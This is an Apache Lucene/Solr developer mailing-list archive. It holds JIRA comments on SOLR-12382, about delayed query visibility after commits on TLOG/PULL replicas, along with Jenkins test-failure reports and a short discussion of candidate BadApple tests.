 * Your first query is made.  It gets load balanced by the cluster to a replica 
other than the leader.
 * Within 15 seconds (your autoCommit interval), a hard commit is fired, 
flushing all segments to disk.  At this point, the changes to the index will be 
on disk, so they are replicated.
 * A query here will see the change, no matter which replica it is sent to.

The solution to that is to use hard commits or NRT replicas.


> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: SolrCloud on Amazon Linux AMI 2018.03
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called.
> 7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica
> Commit settings
>  
>   15000 
>   false 
> 
>  
>   -1 
> 



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Shawn Heisey (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483184#comment-16483184
 ] 

Shawn Heisey commented on SOLR-12382:
-

We do have documentation that says NRT replica types are the only kind that 
support soft commits.

https://lucene.apache.org/solr/guide/7_3/shards-and-indexing-data-in-solrcloud.html#all-nrt-replicas

If your code is doing a soft commit, then this is what's happening:

 * Changes are indexed.
 * A soft commit is called.
 * The leader does the commit, but only into memory.  That change is NOT 
replicated to the other replicas.
 * Your first query is made.  It gets load balanced by the cluster to a replica 
other than the leader.
 * Within 15 seconds (your autoCommit interval), a hard commit is fired, 
flushing all segments to disk.  At this point, the changes to the index will be 
on disk, so they are replicated.
 * A query here will see the change, no matter which replica it is sent to.

The solution to that is to use hard commits or NRT replicas.


> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: SolrCloud on Amazon Linux AMI 2018.03
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called.
> 7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica
> Commit settings
>  
>   15000 
>   false 
> 
>  
>   -1 
> 



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Mark Miller (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483183#comment-16483183
 ] 

Mark Miller commented on SOLR-12382:


I wonder if tlog replica types even try to support this - we have test code to 
make it work in tests that is based on an assert to make sure this works in 
tests (that we don't return from the commit until the replicas are up to date 
with the leader) - but from what I've seen, it's not full proof and it wouldn't 
be used outside of tests.

> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: SolrCloud on Amazon Linux AMI 2018.03
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called.
> 7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica
> Commit settings
>  
>   15000 
>   false 
> 
>  
>   -1 
> 



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Shawn Heisey (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483165#comment-16483165
 ] 

Shawn Heisey commented on SOLR-12382:
-

Checking my IRC log, looks like the IRC discussion was on the 17th.

Looking at the IRC log, I see that there wasn't a lot of info, but when you 
recreated the collection on the same systems with the same config using NRT 
replicas, and the problem went away, that was a pretty clear indication to me 
that Solr might be misbehaving.

The one thing that I can think of which might cause problems, don't know why I 
didn't mention it on IRC, would be caused by the commit call being a soft 
commit.  I see that you mentioned "commit()" in your problem description on 
IRC.  Is that literally what the SolrJ code says, or are there parameters in 
the commit call?

> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: SolrCloud on Amazon Linux AMI 2018.03
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called.
> 7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica
> Commit settings
>  
>   15000 
>   false 
> 
>  
>   -1 
> 



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[JENKINS] Lucene-Solr-BadApples-Tests-7.x - Build # 64 - Still Unstable

2018-05-21 Thread Apache Jenkins Server
Build: https://builds.apache.org/job/Lucene-Solr-BadApples-Tests-7.x/64/

3 tests failed.
FAILED:  org.apache.solr.cloud.TestAuthenticationFramework.testBasics

Error Message:
Error from server at 
http://127.0.0.1:38720/solr/testcollection_shard1_replica_n2: Expected mime 
type application/octet-stream but got text/html.Error 404 
Can not find: /solr/testcollection_shard1_replica_n2/update  
HTTP ERROR 404 Problem accessing 
/solr/testcollection_shard1_replica_n2/update. Reason: Can not find: 
/solr/testcollection_shard1_replica_n2/updatehttp://eclipse.org/jetty";>Powered by Jetty:// 9.4.10.v20180503  
  

Stack Trace:
org.apache.solr.client.solrj.impl.CloudSolrClient$RouteException: Error from 
server at http://127.0.0.1:38720/solr/testcollection_shard1_replica_n2: 
Expected mime type application/octet-stream but got text/html. 


Error 404 Can not find: 
/solr/testcollection_shard1_replica_n2/update

HTTP ERROR 404
Problem accessing /solr/testcollection_shard1_replica_n2/update. Reason:
Can not find: 
/solr/testcollection_shard1_replica_n2/updatehttp://eclipse.org/jetty";>Powered by Jetty:// 9.4.10.v20180503




at 
__randomizedtesting.SeedInfo.seed([E67EF89C67B9ADC0:DBA656B05F57F3B0]:0)
at 
org.apache.solr.client.solrj.impl.CloudSolrClient.directUpdate(CloudSolrClient.java:551)
at 
org.apache.solr.client.solrj.impl.CloudSolrClient.sendRequest(CloudSolrClient.java:1015)
at 
org.apache.solr.client.solrj.impl.CloudSolrClient.requestWithRetryOnStaleState(CloudSolrClient.java:886)
at 
org.apache.solr.client.solrj.impl.CloudSolrClient.requestWithRetryOnStaleState(CloudSolrClient.java:948)
at 
org.apache.solr.client.solrj.impl.CloudSolrClient.requestWithRetryOnStaleState(CloudSolrClient.java:948)
at 
org.apache.solr.client.solrj.impl.CloudSolrClient.requestWithRetryOnStaleState(CloudSolrClient.java:948)
at 
org.apache.solr.client.solrj.impl.CloudSolrClient.requestWithRetryOnStaleState(CloudSolrClient.java:948)
at 
org.apache.solr.client.solrj.impl.CloudSolrClient.requestWithRetryOnStaleState(CloudSolrClient.java:948)
at 
org.apache.solr.client.solrj.impl.CloudSolrClient.request(CloudSolrClient.java:819)
at 
org.apache.solr.client.solrj.SolrRequest.process(SolrRequest.java:194)
at 
org.apache.solr.client.solrj.request.UpdateRequest.commit(UpdateRequest.java:233)
at 
org.apache.solr.cloud.TestAuthenticationFramework.collectionCreateSearchDeleteTwice(TestAuthenticationFramework.java:127)
at 
org.apache.solr.cloud.TestAuthenticationFramework.testBasics(TestAuthenticationFramework.java:75)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
a

[JENKINS] Lucene-Solr-7.x-Linux (32bit/jdk1.8.0_172) - Build # 1951 - Unstable!

2018-05-21 Thread Policeman Jenkins Server
Build: https://jenkins.thetaphi.de/job/Lucene-Solr-7.x-Linux/1951/
Java: 32bit/jdk1.8.0_172 -client -XX:+UseConcMarkSweepGC

4 tests failed.
FAILED:  org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState

Error Message:
Did not expect the processor to fire on first run! event={   
"id":"6fe15b62c6fbTd9tg4a0s2nyqqoj9b2xtxulkb",   "source":"node_added_trigger", 
  "eventTime":123013691524859,   "eventType":"NODEADDED",   "properties":{ 
"eventTimes":[123013691524859], "nodeNames":["127.0.0.1:42829_solr"]}}

Stack Trace:
java.lang.AssertionError: Did not expect the processor to fire on first run! 
event={
  "id":"6fe15b62c6fbTd9tg4a0s2nyqqoj9b2xtxulkb",
  "source":"node_added_trigger",
  "eventTime":123013691524859,
  "eventType":"NODEADDED",
  "properties":{
"eventTimes":[123013691524859],
"nodeNames":["127.0.0.1:42829_solr"]}}
at 
__randomizedtesting.SeedInfo.seed([A35E7B72FDBA8F06:6DF0DFE10583F710]:0)
at org.junit.Assert.fail(Assert.java:93)
at 
org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.lambda$new$0(NodeAddedTriggerTest.java:49)
at 
org.apache.solr.cloud.autoscaling.NodeAddedTrigger.run(NodeAddedTrigger.java:161)
at 
org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState(NodeAddedTriggerTest.java:257)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleStoreClassName$1.evaluate(TestRuleStoreClassName.java:41)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleAssertionsRequired$1.evaluate(TestRuleAssertionsRequired.java:53)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgn

[jira] [Commented] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Shawn Heisey (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483148#comment-16483148
 ] 

Shawn Heisey commented on SOLR-12382:
-

I've re-opened the issue.  Let's gather some evidence.  The logfiles from all 
the replicas while you replicate the problem would be useful.  If you can 
restart the Solr instances before re-creating, so the logfile is fresh, that's 
best, but if that's difficult, don't worry about it.


> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: SolrCloud on Amazon Linux AMI 2018.03
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called.
> 7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica
> Commit settings
>  
>   15000 
>   false 
> 
>  
>   -1 
> 



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Nguyen Nguyen (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483113#comment-16483113
 ] 

Nguyen Nguyen commented on SOLR-12382:
--

Yup. That was me in IRC.  You told me to create a JIRA ticket instead of 
sending to the mailing list.  Please let me know how to get this issue back 
active again.

> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: SolrCloud on Amazon Linux AMI 2018.03
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called.
> 7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica
> Commit settings
>  
>   15000 
>   false 
> 
>  
>   -1 
> 



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Shawn Heisey (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483108#comment-16483108
 ] 

Shawn Heisey commented on SOLR-12382:
-

I do recall a discussion on the IRC channel quite some time ago that is 
reminiscent of this.  If that's you, it's been quite a while since we had that 
discussion, and I apologize for jumping the gun.

> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: SolrCloud on Amazon Linux AMI 2018.03
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called.
> 7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica
> Commit settings
>  
>   15000 
>   false 
> 
>  
>   -1 
> 



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Closed] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Shawn Heisey (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Shawn Heisey closed SOLR-12382.
---

> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: SolrCloud on Amazon Linux AMI 2018.03
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called.
> 7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica
> Commit settings
>  
>   15000 
>   false 
> 
>  
>   -1 
> 



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Resolved] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Shawn Heisey (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Shawn Heisey resolved SOLR-12382.
-
Resolution: Invalid

Problems like this are rarely bugs.  More likely that there is a reason commits 
are taking a long time, such as a configuration problem or insufficient system 
resources.

This issue tracker is not a support portal.  We have mailing lists and an IRC 
channel which should be used to discuss all problems before opening an issue.

http://lucene.apache.org/solr/community.html#mailing-lists-irc

Info we're going to want when you do get to the mailing list or the IRC 
channel: A solr.log file that includes a commit and the subsequent queries, 
with information about what documents were sent to the update handler, and the 
query details.  The full solrconfig.xml file would also be useful.

If it turns out there actually is a bug, we can re-open this issue.

> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: SolrCloud on Amazon Linux AMI 2018.03
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called.
> 7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica
> Commit settings
>  
>   15000 
>   false 
> 
>  
>   -1 
> 



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Updated] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Nguyen Nguyen (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Nguyen Nguyen updated SOLR-12382:
-
Description: 
On collection with TLOG/PULL replicas, queries that follow right after 
commit(waitSearch:true) would NOT return newly added data until several seconds 
later.

Tested same scenario on another collection with only NRT replicas and found 
that it behaved as expected (query returned newly added data right after 
commit(waitSearch:true) was called.


7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica

Commit settings

 
  15000 
  false 

 
  -1 


  was:
On collection with TLOG/PULL replicas, queries that follow right after 
commit(waitSearch:true) would NOT return newly added data until several seconds 
later.

Tested same scenario on another collection with only NRT replicas and found 
that it behaved as expected (query returned newly added data right after 
commit(waitSearch:true) was called.


> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: SolrCloud on Amazon Linux AMI 2018.03
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called.
> 7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica
> Commit settings
>  
>   15000 
>   false 
> 
>  
>   -1 
> 



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Updated] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Nguyen Nguyen (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Nguyen Nguyen updated SOLR-12382:
-
Environment: 
SolrCloud on Amazon Linux AMI 2018.03

 

  was:
7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica

 

Commit settings

 
  15000 
  false 

 
  -1 


 


> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: SolrCloud on Amazon Linux AMI 2018.03
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Updated] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Nguyen Nguyen (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Nguyen Nguyen updated SOLR-12382:
-
Environment: 
7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica

 

Commit settings

 
  15000 
  false 

 
  -1 


 

  was:
7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica

 

Commit settings

{{ }}
{{  15000 }}
{{  false }}
{{}}
{{ }}
{{  -1 }}
{{}}

 


> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: 7.3 SolrCloud with 3 shards, each shard has 2 TLOG 
> replicas + 1 PULL replica
>  
> Commit settings
>  
>   15000 
>   false 
> 
>  
>   -1 
> 
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



Re: BadApple candidates

2018-05-21 Thread Erick Erickson
Sure

On Mon, May 21, 2018, 15:11 Alan Woodward  wrote:

> Looks like it was an OOM, can you leave that one be for now?
>
> > On 21 May 2018, at 19:11, Erick Erickson 
> wrote:
> >
> > Alan:
> >
> >
> http://fucit.org/solr-jenkins-reports/job-data/sarowe/Lucene-Solr-Nightly-7.x/256/
> >
> > You can get there from Hoss's rollup reports here:
> > http://fucit.org/solr-jenkins-reports/failure-report.html
> >
> > To be included in any potential BadApple, two things must be true:
> > 1> it must have failed since last Monday
> > 2> it must have failed in the report collected two weeks ago Monday
> >
> > Erick
